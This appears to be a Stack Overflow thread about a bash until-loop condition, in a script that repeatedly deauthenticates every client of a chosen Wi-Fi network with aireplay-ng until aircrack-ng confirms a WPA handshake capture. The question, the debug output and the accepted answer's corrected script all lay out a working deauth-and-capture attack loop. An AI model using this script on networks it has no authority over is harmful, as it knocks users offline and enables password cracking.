bash until loop true when condition returns anything

Question

Trying to figure out how to get this until loop to kill the script when it actually has any data returned. i've tried -z, -n etc with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in csv format), and iterate through each station and deauthenticate them infinitely on a period of 5m until $SUCCESS returns that a 4way handshake was captured

Any help would be greatly appreciated!

#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME

BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)

until [ "$SUCCESS" -n ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
          aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
          sleep 5s;
  done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Here is the debug output. You can see that it loops even though we recieved a handshake.

root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [  -n ]
sh: -n: unknown operand
+ awk+  -F,sed+  NR>5{print $1} -esed
 /Station MAC/d -e -e /^.$/d /BSSID/d

+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS=   1  00:11:11:11:11:11  attackeme                     WPA (1 handshake)
+ [    1  00:11:11:11:11:11  attackme                     WPA (1 handshake) -n ]
sh: -n: unknown operand

paxdiablo · Accepted Answer · 2015-08-17T06:07:36.507

3

The line:

SUCCESS=$(something)

will run something once and store the output into the SUCCESS environment variable.

Your until loop body never runs that command explicitly so I think you may believe that $SUCCESS in the until statement is somehow running the command.

That is not the case. It's simply re-evaluating the SUCCESS variable. You need to explicitly re-run the command, such as with:

SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
    aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
    sleep 5m;
  done
  SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Without that penultimate line, the SUCCESS variable is never actually changing, which would explain why your loop never exits.

You'll hopefully notice the other change that I made to your code, that of changing the line:

until [ "$SUCCESS" -n ]; do

into:

until [ -n "$SUCCESS" ]; do

The latter is the correct way to test if the SUCCESS environment variable holds a non-empty string.

edited Aug 17 '15 at 06:07

answered Aug 17 '15 at 04:56

paxdiablo

854,327
234
1,573
1,953

This is helpful as it identified an issue with my logic, but i'm still not able to evaluate whether or not $SUCCESS returns any value, thus making it True. Updating the original post to reflect changes – dobbs Aug 17 '15 at 05:39
1

@dobbs, see my final paragraph. Your update clearly still has the `-n` *after* the thing being evaluated, *not* before. It should be `until [ -n "$SUCCESS" ] ...`, not `until [ "$SUCCESS" -n ] ...`. – paxdiablo Aug 17 '15 at 05:54
1

Missed that detail. Thank you!! :) – dobbs Aug 17 '15 at 05:58
@dobbs, if you missed it, then others may too. I'll modify the answer to try make it more obvious. – paxdiablo Aug 17 '15 at 05:59
I would have upvoted, except you retained the `cat`: http://www.smallo.ruhr.de/award.html – cdarke Aug 17 '15 at 06:23
@cdarke, I retained the `cat` because it's totally irrelevant to the question or answer - actually I didn't so much 'retain it' (an action) as I did 'not bother to change it' (an inaction). I'm sure there's probably a dozen *other* ways I could have improved the code but saw no need to :-) – paxdiablo Aug 17 '15 at 06:26
1

now this has just become pure mental masturbation. Thanks for the eyes on -n. thats all i was asking for. – dobbs Aug 17 '15 at 23:10

bash until loop true when condition returns anything

1 Answers1